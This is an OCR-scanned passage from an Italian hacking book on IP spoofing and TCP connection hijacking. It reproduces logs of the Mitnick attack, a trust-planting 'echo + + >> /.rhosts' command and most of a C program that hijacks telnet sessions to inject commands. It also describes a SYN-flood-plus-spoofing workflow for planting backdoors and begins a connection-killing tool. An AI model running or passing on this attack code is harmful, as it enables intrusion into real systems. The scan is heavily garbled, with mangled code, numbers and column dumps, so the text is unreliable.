4096 


14 


18 


25 


153536 


130 


92 


6 


97. 


625 


> 


server . 


login : 


s 


1382726985. 


1382726985 (0) 


win 


4096 


14 


18 


25 


400869 


130 


92 


6 


97. 


626 


> 


server 


login : 


s 


1382726986 


1382726986(0) 


win 


4096 


14 


18 


25 


483127 


130 


92 


6 


97. 


627 


> 


server 


login : 


s 


1382726987 


1382726987 (0) 


win 


4096 


14 


18 


25 


599582 


130 


92 


6 


97. 


628 


> 


server . 


login : 


s 


1382726988. 


1382726988 (0) 


win 


4096 


14 


18 


25 


653131 


130 


92 


6 


97. 


629 


> 


server 


login: 


s 


1382726989 


1382726989(0) 


win 


4096 



Nel caso di quell'attacco Tsutomu identificò 20 tentativi di connessione provenienti da 
apollo.it.luc.edu diretti al x-terminal.shell. 

Lo scopo di questi tentativi era quello di determinare il comportamento del generatore di 
sequenza TCP relativa a x-terminal's. 

Dopo aver tentato per 20 volte di connettersi l'attaccante registra i pacchetti che riceve 
indietro. 

Notate che il numero iniziale incrementa di un unità ad ogni connessione, il che denota che i 

pacchetti SYN non vengono generati dall'implementazione TCP del sistema. 

Notate anche che I pacchetti SYN-ACK del X-terminal possiedono un analogo incremento: 

14:18:25 .906002 apollo . it . lue . edu. 1000 > x-terminal.shell: S 1382726990 : 1382726990 (0) 
win 4096 

14:18:26.094731 x-terminal.shell > apollo . it . lue . edu . 1000 : S ggfj^j^gg; 2021824000 (0) 
ack 1382726991 win 4096 

14:18:26.172394 apollo . it . lue . edu . 1000 > x-terminal.shell: R 1382726991:1382726991(0) 
win 0 

14:18:26 .507560 apollo . it . lue . edu . 999 > x-terminal.shell: S 1382726991 : 1382726991 (0) 
win 4096 

14:18:26.694691 x-terminal.shell > apollo . it . lue . edu . 999 : S Vliy*HJ.-?7>IiIi. : 2021 952000 (0) 
ack 1382726992 win 4096 

14:18:26 .775037 apollo . it . lue . edu . 999 > x-terminal.shell: R 1382726992:1382726992(0) 
win 0 
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14:18:26.775395 apollo . it . lue . edu . 999 > x-terminal . shell : R 1382726992 : 1382726992 (0) 
win 0 

14:18:27 .014050 apollo . it . lue . edu . 998 > x-terminal . shell : S 1382726992 : 1382726992 (0) 

win 4096 

14:18:27.174846 x-terminal. shell > apollo . it . lue . edu . 998 : S VIiPMiMÌIiBIi. : 2022080000 10) 
ack 1382726993 win 4096 

14:18:27 .251840 apollo . it . lue . edu . 998 > x-terminal . shell : R 1382726993 : 1382726993 (0) 
win 0 

14:18:27 .544069 apollo . it . lue . edu . 997 > x-terminal . shell : S 1382726993 : 1382726993 (0) 
win 4096 

14:18:27 .714932 x-terminal . shell > apollo . it . lue .edu . 997 : S gggggggfJ^JJ : 2022208000 (0) 

14:18:27 .794456 apollo, it . lue. edu . 997 > x-terminal . shell : R 1382726994 : 1382726994 (0) 
win 0 

14:18:28 .054114 apollo . it . lue .edu. 996 > x-terminal . shell : S 1382726994 : 1382726994 (0) 

win 4096 

14:18:28.224935 x-terminal . shell > apollo . it . lue . edu . 996 : S MiPMeUffilffi. : 2022336000 10) 
ack 1382726995 win 4096 

14:18:28 .305578 apollo . it . lue . edu . 996 > x-terminal . shell : R 1382726995 : 1382726995 (0) 
win 0 

14:18:28.564333 apollo . it . lue . edu . 995 > x-terminal . shell : S 1382726995:1382726995(0) 
win 4096 

14:18:28 .734953 x-terminal . shell > apollo . it . lue . edu . 995 : S Vity-MÓHIHi. : 2022464000 ( 0) 
ack 1382726996 win 4096 

14:18:28.811591 apollo . it . lue .edu .995 > x-terminal . shell : R 1382726996:1382726996(0) 
win 0 

14:18:29 .074990 apollo . it . lue .edu . 994 > x-terminal . shell : S 1382726996:1382726996(0) 
win 4096 

14:18:29 .274572 x-terminal . shell > apollo . it . lue . edu . 994 : S Vl»y#M:flìIiIì, : 2022592000 1 0) 
ack 1382726997 win 4096 

14:18:29 .354139 apollo . it . lue .edu . 994 > x-terminal . shell : R 1382726997 : 1382726997 (0) 
win 0 

14:18:29 .354616 apollo . it . lue .edu . 994 > x-terminal . shell : R 1382726997 : 1382726997 (0) 
win 0 

14:18:29 .584705 apollo . it . lue . edu . 993 > x-terminal . shell : S 1382726997: 1382726997 (0) 
win 4096 

14:18:29 .755054 x-terminal . shell > apollo . it . lue . edu . 993 : S yiiyMf^JHHH!. : 2022720000 (0) 
ack 1382726998 win 4096 

14:18:29 .840372 apollo . it . lue . edu . 993 > x-terminal . shell : R 1382726998 : 1382726998 (0) 
win 0 

14:18:30.094299 apollo . it . lue .edu . 992 > x-terminal . shell : S 1382726998 : 1382726998 (0) 
win 4096 

14:18:30 .265684 x-terminal . shell > apollo . it . lue . edu . 992 : S V4>y#i:E(ZHiIi. : 2022848000 1 0) 
ack 1382726999 win 4096 

14:18:30 .342506 apollo . it . lue .edu . 992 > x-terminal . shell : R 1382726999 : 1382726999 (0) 
win 0 

14:18:30.604547 apollo . it . lue .edu . 991 > x-terminal . shell : S 1382726999:1382726999(0) 
win 4096 

14 : 18 : 30 . 775232 x-terminal . shell > apollo . it . lue . edu . 991 : S VW**:MZìI>Ii. : 2022976000 (0) 
ack 1382727000 win 4096 

14:18:30 .852084 apollo . it . lue . edu . 991 > x-terminal . shell : R 1382727000 : 1382727000 (0) 
win 0 

14:18:31.115036 apollo . it . lue .edu . 990 > x-terminal . shell : S 1382727000 : 1382727000 (0) 

win 4096 

14:18:31.284694 x-terminal . shell > apollo . it . lue . edu . 990 : S V4iY#mZltIiTi. : 2023104000 IO) 
ack 1382727001 win 4096 

14:18:31 .361684 apollo . it . lue .edu . 990 > x-terminal . shell : R 1382727001 : 1382727001 (0) 
win 0 

14:18:31 .627817 apollo . it . lue . edu . 989 > x-terminal . shell : S 1382727001:1382727001 (0) 
win 4096 

14 : 18 : 31 . 795260 x-terminal . shell > apollo . it . lue . edu . 989 : S VityXMrTHili. : 2023232000 ( 0) 
ack 1382727002 win 4096 

14:18:31 .873056 apollo . it . lue . edu . 989 > x-terminal . shell : R 1382727002 : 1382727002 (0) 
win 0 

14:18:32.164597 apollo . it . lue .edu . 988 > x-terminal . shell : S 1382727002 : 1382727002 (0) 

win 4096 

14:18:32.335373 x-terminal . shell > apollo . it . lue . edu . 988 : S yiiytefenilHHi. : 2023360000 IO) 
ack 1382727003 win 4096 

14:18:32.413041 apollo . it . lue . edu . 988 > x-terminal . shell : R 1382727003 : 1382727003 (0) 
win 0 

14:18:32 .674779 apollo . it . lue . edu . 987 > x-terminal . shell : S 1382727003:1382727003(0) 
win 4096 

14:18:32 .845373 x-terminal . shell > apollo . it . lue . edu . 987 : S V4ty#ll:£filili. : 2023488000 1 0) 
ack 1382727004 win 4096 

14:18:32.922158 apollo . it . lue .edu . 987 > x-terminal . shell : R 1382727004 : 1382727004 (0) 
win 0 
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14:18:33.184839 apollo . it . lue . edu . 986 > x-terminal . shell : S 1382727004 : 1382121004 (0) 
wln 4096 

14:18:33 .355505 x-terminal . shell > apollo . it . lue . edu . 986 : S ££££Ì2fiiIifi 2023616000 (0) 

14:18:33 .435221 apollo . it . lue . edu . 986 > x-terminal . shell : R 1382121005:1382121005(0) 
win 0 

14:18:33 .695110 apollo, it . lue . edu . 985 > x-terminal . shell : S 1382121005:1382121005(0) 
win 4096 

14:18:33.985966 x-terminal . shell > apollo . it . lue . edu . 985 : 

' - -- -- - _._■„ A r>n/- 



202314400 



\: 20231 44000(0) 



14:18:34.062401 apollo . it . lue . edu . 985 > x-terminal . shell : R 1382121006 : 1382121006 (0) 
win 0 

14:18:34 .204953 apollo . it . lue . edu . 984 > x-terminal . shell : S 1382121006 : 1382121006 (0) 
win 4096 

14:18:34 .375641 x-terminal . shell > apollo . it . lue . edu . 984 : S yjgcgj^jgj 

ack 1382121001 win 4096 
14:18:34 .452830 apollo . it . lue . edu . 984 > x-terminal . shell : R 1382121001 : 1382121001 (0) 
win 0 

14:18:34.114996 apollo . it . lue .edu . 983 > x-terminal . shell : S 1382121001 : 1382121001 (0) 

win 4096 

14:18:34 .885071 x-terminal . shell > apollo . it . lue . edu . 983 : S gjmjgfjfjfjj 
ack 1382121008 win 4096 
14:18:34 .962030 apollo . it . lue .edu . 983 > x-terminal . shell : R 1382121008 : 1382121008 (0) 
win 0 

14:18:35 .225869 apollo . it . lue .edu . 982 > x-terminal . shell : S 1382121008 : 1382121008 (0) 
win 4096 

14:18:35 .395723 x-terminal . shell > apollo . it . lue . edu . 982 : S gggJJJ^SJJJJ 

ack 1382121009 win 4096 
14:18:35 .412150 apollo . it . lue .edu . 982 > x-terminal . shell : R 1382121009 : 1382121009 (0) 
win 0 

14:18:35 .135011 apollo . it . lue .edu . 981 > x-terminal . shell : S 1382121009 : 1382121009 (0) 
win 4096 

14:18:35.905684 x-terminal . shell > apollo . it . lue . edu . 981 : S YÀtrZYMWi 
ack 1382121010 win 4096 

1 4:1 8:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 1 38272701 0:1 38272701 0(0) win 0 



\: 202381 2000(0) 



\: 2024000000(0) 



\: 2024128000(0) 



\: 2024256000(0) 



I numeri sequenziali sono quelli messi in reverse. 

Notate che ogni pacchetto SYN-ACK inviato da x-terminal possiede un numero iniziale di 
sequenza che è di 1 28,000 maggiore di quello precedente. 

Quando aggiungiamo questo numero magico al numero squenziale riusciamo ad ottenere il 
successivo numero sequenziale da usare. 

Vediamo ora un SYN forgiato (connection request), presubilmente dal server. login indirizzato 
a x-terminal.shell. 

L'assunzione è che x-terminal probabilmente rende trust il server server, in modo che x- 
terminal possa eseguire qualsiasi cosa che il server richieda (o qualsiasi cosa che venga 
richiesto da qualche d'uno mascherato da server) . 

x-terminal replica al server con un SYN-ACK, il quale deve essere ACK-ato per fare in modo 
che la connessione sia aperta. 

Normalmente il numero di sequenza dal SYN-ACK è richiesto al fine di generare un ACK 
valido. 

Tuttavia l'attaccante è in grado di predire il numero di sequenza contenuto nel SYN-ACK 
basato sul comportamentp conosciuto del generatore di seuenze TCP di x-terminal, e quindi 
è capace di creare l'ACK al SYN-ACK senza vederlo.: 



La macchina che esegue lo spoofing ora possiede una connessione a una via alla x- 
terminal.shell che appare essere del server. login. 

Esso può mantenere la connessione e inviare dati a patto che possa creare l'ACK corretto 
relativo a qualsiasi dato inviato dal x-terminal. 
Questo invia il seguente : 




quale corrisponde a: 
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14:18:37 serverft rsh x-termlnal "echo + + »/ . rhosts" 

Il tempo totale passato dal primo pacchetto falsificato è minire di 16 secondi. 
La connessione falsificata è ora rilasciata: 



14:18:41.347003 server. login > x-terminal . shell : . ack 2 win 4096 
14:18:42.255978 server . login > x-terminal . shell : . ack 3 win 4096 
14:18:43.165874 server. login > x-terminal . shell: F 32:32(0) ack 3 win 4096 
14:18:52.179922 server. login > x-terminal . shell : R 1382727043 : 1382727043 (0) win 4096 
14:18:52.236452 server. login > x-terminal . shell : R 1382727044 : 1382727044 (0) win 4096 



A questo punto le connessioni hai open che riempivano la coda del computer a cui veniva 
data fiducia devono essere chiuse mediante l'invio di pacchetti con il flag FIN oppure con 
quello RST attivo. 

Ora vediamo RSTs a resettare la connessione "mezza aperta" e svuotare la coda relativa 
alla connessione con server. login: 



14. 


18. 


■52. 


298431 


130. 


92. 


6. 


97. 
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> 


server 


. login : 


R 


1382726960. 


: 1382726960 (0) 


win 
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> 


server 
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R 


1382726961 


: 1382726961 (0) 


win 


4096 
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server . 
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R 
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win 
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server. login ra può accettare connessioni. 

Dopo che è stata acquisito l'accesso come root grazie all' IP address spoofing, un modulo 
kernel chiamato "tap-2.01" viene compilato e installato su x-terminal: 

x-terminal % modstat 

Id Type Loadaddr Size B-major C-major Sysnum Mod Name 

1 Pdrv ff050000 1000 59. tap/tap-2.01 alpha 

x-terminal % Is -1 /dev/tap 



Questo appare essere un modulo del kernel STREAMS il quale può essere inserito all'interno 

dello STREAMS stack esistente e usato per acquisire il controllo di un tty device. 

Questo viene usato per prendere il controllo di una sessione di login già autenticata. 

Questa tecnica viene anche chiamata Hijacking. 

Il seguente programma in C è l'esempio di questa tecnica. 

/****************************************************** 

/* Hijack - Example program on connection hijacking with IP spoofing */ 
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/* */ 

/* Purpose - taklng control of a runnlng telnet sesslon, and executlng */ 

/* our own command In that shell . */ 

/* */ 

/* Author - Brecht Claerhout <Coder@reptlle . rug . ac .be> */ 

/* Serlous advlce, comments, statements, greets, always welcome */ 

/* flames, moronlc 3133t >/dev/null */ 

/* */ 

/* Dlsclalmer - Thls program Is for educational purposes only . I am in */ 

/* NO way responsible for what you do with thls program, */ 

/* or any damage you or thls program causes . */ 

/* ' " " V 

/* For whom - People with a little knowledge of TCP/IP, C source code */ 

/* and general UNIX. Otherwise , please keep your hands of, */ 

/* and catch up on those things first. */ 

/* ' */ 

/* Limited to - Linux 1.3.X or higher. */ 

/* ETHERNET support ("ethO" device) */ 

/* If you network configuration differs it shouldn 't be to */ 

/* hard to modify your self . I got it working on PPP too, */ 

/* but I 'm not including extra configuration possibilities */ 

/* because this would overload this first release that is */ 

/* only a demonstration of the mechanism. */ 

/* Anyway if you only have ONE network device (slip, */ 

/* PPPr ■ ■ ■ ) after a quick look at this code and spoofit.h */ 

/* it will only take you a few secs to fix it . . . */ 

/* People with a bit of C knowledge and well known with */ 

/* their OS shouldn 't have to much trouble to port the code.*/ 

/* If you do, I would love to get the results. */ 

/* ~ */ 

/* Compiling - gcc -o hi jack hi jack. c */ 

/* ' */ 

/* Usage - Usage described in the spoofing article that carne with this. */ 

/* If you didn't get this, try to get the full release... */ 

/* ' ' */ 

/* See also - Sniffit (for getting the necessairy data on a connection) */ 
/************************************* 

^include "spoofit.h" /* My spoofing include.... read licence on this 
*/ 

/* Those 2 ' de f Ines ' are important for putting the receiving device in */ 



char to_data[] = {0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, OxOa, 0x0 a) ; 



int fd_receive, fd_send; 
char CLIENT [100] , SERVER[100] ; 
int CLIENT_P; 

void main(int argc, char *argv[]) 
{ 

int i,j,count; 

struct sp_wait_packet attack_info ; 
unsigned long sp_seq , sp_ack; 
unsigned long old_seq , old_ack; 
unsigned long serv_seq , serv_ack; 

/* This data used to clean up the shell line */ 
char to_data[]={0x08, 0x08,0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 
char evil_data[] = "echo \"echo HACKED\ " »$HOME/.profile\n"; 

if (argc!=4) 
{ 

printf ("Usage: %s client client_port server \n" , argv[0] ) ; 
exit(l); 
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; 

strcpy (CLIENT, argv[l]) ; 
CLIENT_P=ato± (argv[2] ) ; 
strcpy (SERVER, argv[ 3 ] ) ; 

/* preparing ali necessary sockets (sending + recelving) */ 
DEV_PREFIX = INTERFACE_PREFIX; 
fd_send = open_sendlng ( ) ; 

fd_recelve = open_recelvlng (INTERFACE, 0) ; /* normal BLOCKING mode */ 

prlntf ( "Starting Hljacklng demo - Brecht Claerhout 1996\n") ; 
prlntf (" ; 

for (j=0;j<50;j++) 
{ 

prlntf ("\nTakeover phase 1: Steallng connection . \n" ) ; 

walt_packet (fd_receive, Sattack_info, CLIENT, CLIENT_P, SERVER, 

23,ACK\PSH, 0) ; 

sp_seq=attack_lnfo . seq+attack_lnfo . datalen; 
sp_ack=attack_lnfo . ack; 

prlntf (" Sending Spoofed clean-up data. . .\n") ; 

transmlt_TCP (fd_send, to_data, 0, 0, slzeof (to_data) , CLIENT, CLIENT_P, 

SERVER, 23, 

sp_seq, sp_ack, ACK/PSH) ; 

/* NOTE: always beware you receive y'r OWN spoofed packs ! */ 
/* so handle it If necessary */ 

count=0; 

prlntf (" Waiting for spoof to be conflrmed. . . \n") ; 
while (count<5) 
{ 

walt _packet (fd_recelve, &attack_lnfo, SERVER, 23, CLIENT, CLIENT_P, ACK, 0) ; 
if (attack_lnfo.ack==sp_seq+slzeof (to_data) ) 

count =PERSONAL_ TOUCH; 
else count++; 

}; 

if (count ! =PERSONAL_TOUCH) 

{prlntf ("Phase 1 unsuccesfully ended. \n") ; } 
else {prlntf ("Phase 1 ended. \n") ; break;}; 

}; 

prlntf ("\nTakeover phase 2: Getting on track with SEQ/ACK's again\n") ; 
count=serv_seq=old_ack=0 ; 
while (count<10) 
{ 

old_seq=serv_seq; 
old_ack=serv_ack; 

wait_packet ( fd_receive , &attack_info, SERVER, 23, CLIENT, CLIENT_P, 

ACK, 0) ; 

if (attack_info . datalen==0) 
{ 

serv_seq=attack_info. seq+attack_info. datalen; 
serv_ack=attack_info.ack; 

if( (old_seq==serv_seq) SS (serv_ack==old_ack) ) 
count =PERSONAL_ TOUCH; 
else count++; 

} 

ì; 

if (count ! =PERSONAL_TOUCH) 

{prlntf ("Phase 2 unsuccesfully ended. \n") ; exit(O);} 
prlntf (" Server SEQ: %X (hex) ACK: %X (hex) \n" , serv_seq, serv_ack) ; 
prlntf ("Phase 2 ended. \n") ; 

prlntf ("\nTakeover phase 3: Sending MY data. \n") ; 
prlntf (" Sending evil data.\n"); 

transmit_TCP (fd_send, evil_data, 0, 0, slzeof (evil_data) , CLIENT, CLIENT_P, 
SERVER, 23, serv_ack, serv_seq, ACK/PSH) ; 
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prlntf(" Wai.ti.ng for evil data to be confirmed...\n"); 
whlle (count<5) 
{ 

wa±t_packet (fd_rece±ve, &attack_lnfo, SERVER, 23, CLIENT, CLIENT_P, ACK, 0) ; 
if (attack_info . ack==serv_ack+sizeof (ev±l_data) ) 

count =PERSONAL_ TOUCH; 
else count++; 

}; 

if (count ! =PERSONAL_TOUCH) 

(printf ("Phase 3 unsuccesfully ended. \n") ; exit(O);} 
printf ("Phase 3 ended. \n") ; 

} 



Uso di wj niect nello spoof ing 

Inutile dire che questa di fatto sia una tecnica complessa per cui l'uso di qualche utility 
potente potrebbe semplificare la vita. 

Nei capitoli precedenti, quando abbiamo visto alcuni pacchetti usati dagli hackers, abbiamo 
parlato di wlnject un pacchetto particolarmente potente per quello che riguarda l'iniezione di 
pacchetti manipolati sulla rete. 

Parlando di spoofing abbiamo visto che generalmente ci sono in gioco 3 entità alla quale 
potremmo anche aggiungerne una quarta. 
I primi tre erano : 

A: Target Host 
B: Trusted Host 



Il quarto possiamo considerarlo quelli irraggiungibile. 
X: Unreachable Host 

Prima abbiamo già spiegato il concetto ma in ogni caso penso che possiamo rivederlo in un 
altro modo. 

Sicuramente per concetti complessi come nel caso dello spoofing non sono mai parole 
sciupate. 

Abbiamo anche detto che negli ambienti Unix la creazione di relazioni TRUST possono 
essere fatte facilmente. 

Per fare questo supponiamo di avere un account sulla macchina A: e sulla macchina B: 

Al fine di facilitare le comunicazioni tra le due vogliamo creare una connessione full duplex 

legata ad una relazione trust. 

Nella home directory di A: creiamo il file .rhost 

Nella directory home di B: invece ecreaamo un altro file .rhost. 

A questo punto possiamo utilizzare i vari comandi "r"(login, ecc.) senza dover usare tutte le 
volte un meccanismo di autenticazione. 
Uno dei vari comandi "r" è appunto rlogin . 

Questo è un protocollo basato su una connessione client-server utilizzante TCP come 
metodo di trasporto. 

login permette ad un utente remoto di eseguire un login tra un host ed un altro senza dover 
tutte le volte inserire la password. 

Il discorso sul meccanismo di handshake di questo protocollo lo abbiamo visto nelle pagine 
precedenti. 

Il problema quindi sarebbe ora quello di usare una utility in grado di creare pachetti con 
contenuti manipolabili. 

Precedentemente abbiamo riportato due sorgenti in grado di svolgere delle funzioni 
nell'ambito dello spoofing. 

Nei capitoli precedentei abbiamo anche visto come COMMVIEW è in grado di eseguire la 
costruzione di alcuni pacchetti ma sicuramente la manipolazione di questi mediante questo 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



software è abbastanza complesso in quanto di fatto questo non ci mantiene un mappa visiva 
dei vari campi dell'header in cui dobbiamo inserire i valori da inviare ai vari host. 
Wlnject permette invece di eseguire diversi passi nell'ambito di tutti quelli che devono essere 
fatti per eseguire un attacco di spoofing. 

Per prima cosa wlnject sceglie un host di destinazione e successivamente scopre una 
struttura di trust in relazione ad un host trusted. 

Una volta appurata questa struttura relativa all'host certficato e a quello certificante wlnject 
disabilita l'host certificato, quello trusted, e cerca di campinare i numeri di seuqneza TCP. 
A questo punto sempre wlnject può essere utile per impersonare l'host trusted, indivinare il 
numero d sequenza ed eseguire una connessione con un servizio che a questo punto 
richiede solo più un autenticazione basata sull'indirizzo. 

Se tutta questa sequenza di operazioni è eseguita correttamente da wlnject allora l'attaccante 
potrà inserire qualche backdoor dentro al sistema vittima. 

La cosa sembra semplice ma anche se di fatto non lo è wlnject semplifica sufficientemente le 
cose. 

Uno dei fattori che complicano la vita nelP IP Spoofing è che l'attacco è cieco. 
La prima fase è legata ad un esecuzione di una procedura relativa ad un Denial of Service 
ovvero mediante wlnject vengono forgiati dei pacchetti indirizzati all'host trusted mediante 
datagrammi UDP. 

L'attacante nel caso dei datagrammi sa soltanto che questi raggiungeranno l'host ma tutto il 
procedimento deve essere fatto alla cieca. 

In pratica non sarà mai possibile sapere che cosa spedisce indietro l'host a cui si stanno 
inviando i pacchetti ma deve slo immaginarlo. 

Un altro fatto che l'attaccante deve sapere è se di fatto un host possiede qualche relazione 
trust in quanto se cosi non fosse è chiaro che un attacco sarebbe completamente inutile. 
Sapere questo è relativamente semplice in qanto questo potrebbe essere fatto tramite un 
comando 



showmount -e 
Ad esempio : 

$ showmount -e www. target . com 




il quale viene utilizzato per sapere dove i filesystem vengono esportati. 
Per ricavare altre informazioni può essere utilizzato 



rpcinfo 

Un esempio di output è quello che segue : 
$ rpcinfo -p www. target . com 



program 


vers 


proto 


port 




100000 


3 


udp 


111 


portmapper 


100000 


2 


udp 


111 


portmapper 


100000 


3 


tcp 


111 


portmapper 


100000 


2 


tcp 


111 


portmapper 


100003 


2 


udp 


2049 


nfs 


100003 


3 


udp 


2049 


nfs 


100024 


1 


udp 


808 


status 


100024 


1 


tcp 


810 


status 


100021 


1 


udp 


2049 


nlockmgr 


100021 


3 


udp 


2049 


nlockmgr 


100021 


4 


udp 


2049 


nlockmgr 


100021 


1 


tcp 


2049 


nlockmgr 


100021 


3 


tcp 


2049 


nlockmgr 
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100005 


1 


tcp 


1058 


mountd 


100005 


1 


udp 


1036 


mountd 


391004 


1 


tcp 


1063 




391004 


1 


udp 


1037 




100001 


1 


udp 


1038 


rstatd 


100001 


2 


udp 


1038 


rstatd 


100001 


3 


udp 


1038 


rstatd 


100000 


3 


udp 


111 


portmapper 


100000 


2 


udp 


111 


portmapper 


100000 


3 


tcp 


111 


portmapper 


100000 


2 


tcp 


111 


portmapper 


100003 


2 


udp 


2049 


nfs 


100003 


3 


udp 


2049 


nfs 


100024 


1 


udp 


808 


status 


100024 


1 


tcp 


810 


status 


100021 


1 


udp 


2049 


nlockmgr 


100021 


3 


udp 


2049 


nlockmgr 


100021 


4 


udp 


2049 


nlockmgr 


100021 


1 


tcp 


2049 


nlockmgr 


100021 


3 


tcp 


2049 


nlockmgr 


100021 


4 


tcp 


2049 


nlockmgr 


100005 


1 


tcp 


1058 


mountd 


100005 


1 


udp 


1036 


mountd 


391004 


1 


tcp 


1063 




391004 


1 


udp 


1037 




100001 


1 


udp 


1038 


rstatd 


100001 


2 


udp 


1038 


rstatd 


100001 


3 


udp 


1038 


rstatd 


391002 


1 


tcp 


1070 




100083 


1 


tcp 


1073 





Una volta che viene individividuato l'host trusted questo deve essere disabilitato, come 
abbiamo detto prima, mediante una procedura DOS ovvero inviando un flusso di TCP SYN. 



TCP/I P Sequenze Attack 

Spesso esiste una grossa confusione tra quelle che sono le tecniche di spoofing e quelle che 
vengono definite come attacchi connection hijacking 

Nei capitoli precedenti abbiamo visto i vari protocolli e i formati dei pacchetti relativi a questi. 
In particolar modo per quello che riguarda l'argomento di questo capitolo è interessante 
rivedere l'header dei pacchetti TCP. 

Questo è costituito da almeno 20 BYTEs suddivisi tra diversi campi. 

I campi utilizzati per l'esecuzione delle tecniche di spoofing sono precisamente i seguenti: 

TCP 



0 12 3 


4 5 6 7 


8 9 10 11 12 13 14 15 


16 17 18 19 20 21 22 23 24 25 26 27 28 


29 30 31 


Source Port 


Destination Port 


Sequence Number 


Acknowledgement Number 


D. 
Offset 


Reserved 


Control 


Window 


Checksum 


Urgent Pointer 


Options 


Padding 



• Il campo relativo alla porta sorgente (1 6 bits) 

• Il campo relativo alla porta di destinazione (1 6 bits) 

• Il numero di sequenza (sequenze number di 32 bits) 

• Acknowledgemnt number (32 bits) 

• Windows size (16 bits) 
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Gli steps per creare una connessione tramite il protocollo TCP sono in pratica tre : 

1 - Viene spedito un pacchetto TCP con il flag SYN impostato, ACK a zero e un valore X nel 
sequence number 

2 - Il server risponde con tutti e due i flag SYN e ACK impostati e con il SEQUENCE 
NUMBER impostato con un valore Y e Acknowledgment a valore X. 

3 - Il client risponde con il flag ACK, con il SEQUENXE NUMBER a X+1 e con 
ACKNOWLEDGMENT a Y+1 

Volendolo raffigurare in formato grafico potremmo farlo con : 







SYN=1 ACK=0 SEQ-NUM=X 


SERVER 


CLIENT — 




> 


CLIENT fi 


SYN=1 


ACK=1 SEQ-NUM=X ACK-NUM=X+1 


SERVER 








ACK= 


-1 SEQ=-NUM=X+1 ACK-NUM=Y+1 
1 


SERVER 


CLIENT — 







Soltanto dopo che la connessione è stata inizializzata allora sarà possibile trasmettere i dati. 
Il protocollo TCP possiede dei meccanismi mediante i quali può eseguire le funzionalità 
classiche dei protocolli a finestre rotanti. 

In altre parole penso che sia inutile dire che una delle funzioni principali di questi è di fatto il 
recupero dele informazioni giunte con errori interni. 

Chiaramente un'altra problematica è quella legata al riassemblaggio delle finestre giunte con 
sequenze differenti da quella puramente sequenziale. 

I dati inviati tramite protocollo TCP possono arrivare anche con ordini differenti da quelli 
d'invio. 

La possibilità di poter ricostruire questa sequenza è offerta appunto dalla presenza di questo 
numero sequenziale mentre la ritrasmissione dei pacchetti trasmessi può essere richiesta 
mediante l'acknowledgment number il quale indica il numero del prossimo byte atteso. 
Vediamo un esempio pratico : 

SISTEMA A SEQ-NUM=1000 ACK-NUM=5000 DATI=100 bytes $ SISTEMA B 

SISTEMA A fi - SEQ-NUM=5000 ACK-NUM=1100 DATI=250 bytes SISTEMA B 

SISTEMA A SEQ-NUM=1100 ACK-NUM=5250 DATI=250 bytes $ SISTEMA B 



L'invio di un pacchetto con il flag FIN alzato indica al destinatario che non ci sono più dati da 
spedire per cui dopo che questo viene confermato la connessione viene chiusa. 
Al contrario di questo il flag RST viene utilizzato per reinizializzare la comunicazione che per 
qualsiasi motivo è diventata instabile. 

Fate attenzione che la ricezione di questo flag alzato potrebbe indicare un problema della 
connessione. 

A questo punto vedendo la manipolazione che il protocollo TCP esegue sui flags interni agli 

header dei pacchetti è facile comprendere come l'alterazione voluta di questi valori con il più 

la modifica degli indirizzi di sorgente e di destinazione possa di fatto essere il modo con cui è 

possibile creare attacchi di IP Spooifing, come abbiamo già visto precedentemente. 

Questa parte vuole solo aggiungere alcuni concetti a quanto già visto. 

Una aggiunta che è possibile fare al concetto di spoofing è quello legato alla suddivisione di 

questa tecnica in due differenti le quali si diversificano dal fatto che l'host a cui ci si vuole 

sostituire sia di fatto partecipante alla sottorete della vittima o uno qualsiasi. 

Nel primo caso viene definito spoofing non cieco ovvero quello in cui l'host appartiene alla 

intranet della vittima. 

Nel secondo caso abbiamo a che fare con lo spoofing cieco. 
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Quando esiste un cero numero di host connessi ad una rete e si vuole fare giungere un 
pacchetto ad uno di questi, lo si invia in broadcast in modo tale che tutti lo ricevano ma solo 
quello che a seguito dell'analisi del campo relativo al destinatario identifica come suo l'IP lo 
processa. 

Le schede relative alle interfacce di rete possono essere settate in modo promiscuo. 

Abbiamo visto questa modalità parlando degli sniffer i quali proprio per il loro tipo di 

funzionamento devono processare tutti i pacchetti che gli giungono sopra. 

In modalità promiscua la scheda di rete processa tutti i pacchetti che gli arrivano. 

Nel caso di spoofing non cieco l'attaccante cerca di farsi passare come un host che fa parte 

della sottorete per cui mette la scheda di rete in modalità promiscua in modo da poter leggere 

tutti i pacchetti compresi quelli che dovrebbero arrivare al sistema a cui vuole sostituirsi. 

In questo modo riesce ad individuare il SEQUENCE NUMBER. 

Alcune difficoltà possono sorgere a causa delle scelte fatte per la strutturazione della rete 
mediante il fatto di adottare degli switch anziché degli HUB. 

Gli switch infatti inviano solo al destinatario i pacchetti al contrario di quello che fanno gli hub. 
Come abiamo vistonele pagine precedenti l'invio di pachetti con certi flag alzati permette di 
scollegare certi sistemi. 

Una volta ottenuto il sequenze number l'attaccante potrebbe spedire un pacchetto 
appositamente creato con i flags RST e FIN finalizzato a far cadere la connessione. 
Vediamo come è possibile utilizzando il flag RST. 

Il pacchetto con lo scopo di resettare la connessione possiede solo il SEQUENCE NUMBER 
valido mentre l'AKNOLEDGMENT viene disabilitato. 
Supponiamo di avere questa situazione : 

A H R B A e C = Host della stessa sottorete 

I B = Host di una rete diversa 

C + H = HUB 



Supponiamo che tra gli host A e B ci sia una connessione e che l'attaccante si trovi nella 
postazione C. 

Per cercare di resettare la connessione l'attaccante dovrà attendere di ricevere un pacchetto 
salla connessione A-B. 

Partendo dal presupposto che riceva un pacchetto da B verso A, egli calcolerà il SEQUENCE 
NUMBER a partire dall'ACKNOWLEDGEMENT del pacchetto ricevuto., poi costruirà e 
spedirà un pacchetto con le seguenti impostazioni: 



Campi del pacchetti 


IP: 


IP sorgente = 


A (IP spooffato) 


IP destinazione = 


B 



Campi del pacchetto TCP 

Porta sorgente = Porta usata dall' host A 

Porta destinazione = Porta usata dall' host B 

Sequence number contenente il valore calcolato 



In questo modo viene resettata la connessione. 
Il sorgente implementa questa metodologia. 



/************************************ 

/* Sniper-rst - Example program on connection killing with IP spoofing */ 
Using the RST flag. 

(illustration for 'A short overview of IP spoofing') 



/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 
/* 



Purpose - Killing any TCP connection on your subnet 



*/ 
*/ 
*/ 
